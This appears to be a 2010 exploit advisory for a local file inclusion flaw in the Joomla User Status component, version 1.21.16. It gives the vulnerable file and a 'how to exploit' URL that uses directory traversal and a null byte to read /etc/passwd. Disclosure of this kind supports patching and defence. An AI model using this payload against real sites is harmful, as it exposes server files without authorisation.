55 lines
No EOL
1.7 KiB
Text
55 lines
No EOL
1.7 KiB
Text
---------------------------------------------------------------------------------
|
|
Joomla Component User Status Local File Inclusion
|
|
---------------------------------------------------------------------------------
|
|
|
|
Author : Chip D3 Bi0s
|
|
Group : LatinHackTeam
|
|
Email & msn : chipdebios@gmail.com
|
|
Date : 31 March 2010
|
|
Critical Lvl : Moderate
|
|
Impact : Exposure of sensitive information
|
|
Where : From Remote
|
|
---------------------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
|
|
Application : User Status
|
|
version : 1.21.16
|
|
Developer : Mo Kelly
|
|
License : GPL type : Commercial
|
|
Price : 10.00 USD
|
|
Date Added : 27 March 2010
|
|
Download : http://joomlamo.com/joomlamo/downloads/cat_view/6-other-joomla-components-modules-and-plugins.html
|
|
|
|
|
|
|
|
Description :
|
|
|
|
The component back end allows the entry of locations. Also assigning users to a location is done in the back end.
|
|
Users that are not assigned a location do not show up in the User Status Screen.
|
|
|
|
After creating locations and assigning users you may view their status from the front end.
|
|
Create a menu selection with user User Status component.
|
|
|
|
There is a separate module to allow users to update their status.
|
|
|
|
Another module, "Refresh Page" makes sure that the user status screen accurately reflects users status.
|
|
|
|
A User's status must be updated to change, it will not expire with the user session.
|
|
|
|
|
|
--------------
|
|
file error : components/com_userstatus/userstatus.php
|
|
|
|
how to exploit
|
|
|
|
http://127.0.0.1/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
|
|
|
|
------------------------
|
|
|
|
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
[!] Produced in South America
|
|
+++++++++++++++++++++++++++++++++++++++ |